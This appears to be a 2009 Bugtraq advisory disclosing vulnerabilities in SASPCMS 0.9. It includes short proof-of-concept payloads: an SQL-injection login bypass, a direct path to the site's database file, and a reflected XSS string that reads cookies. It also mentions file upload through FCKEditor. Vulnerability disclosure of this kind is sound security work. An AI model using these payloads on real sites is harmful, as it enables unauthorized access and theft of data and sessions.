Bugtraqmailing list archives
SASPCMS Multiple Vulnerabilities
From: admin () bugreport ir
Date: Wed, 08 Apr 2009 16:43:24 +0430
##########################www.BugReport.ir########################################## AmnPardaz Security Research Team## Title: SASPCMS Multiple Vulnerabilities# Vendor:http://www.lgasoft.com# Vulnerable Version: 0.9 (prior versions also may be affected)# Exploitation: Remote with browser# Fix: N/A#######################################################################################################- Description:####################SASPCMS is an ASP Content Management System . SASPCMS witch uses MSSQL& Microsoft Access as backend database.
####################- Vulnerability:####################+-->Authentication BypassPOC: ' or ''='http://[URL]/saspcms/admin/default.asp+-->Database Information DisclosurePOC:http://[URL]/saspcms/db/menu.mdb+-->Cross Site Scripting (XSS). Reflected XSS attack in "default.asp"in "q" parameter.POC:http://[URL]/saspcms/default.asp?q=<script>alert(document.cookie)</script>
####################- PoC:####################It's possible for remote attackers to upload arbitrary files by usingFCKEditor after login to admin area.
http://www.bugreport.ir/64/exploit.htm####################- Solution:####################Edit the source code to ensure that inputs are properly sanitized.####################- Credit:####################AmnPardaz Security Research & Penetration Testing GroupContact: admin[4t}bugreport{d0t]irwww.BugReport.irwww.AmnPardaz.com
Current thread:
- SASPCMS Multiple Vulnerabilitiesadmin (Apr 08)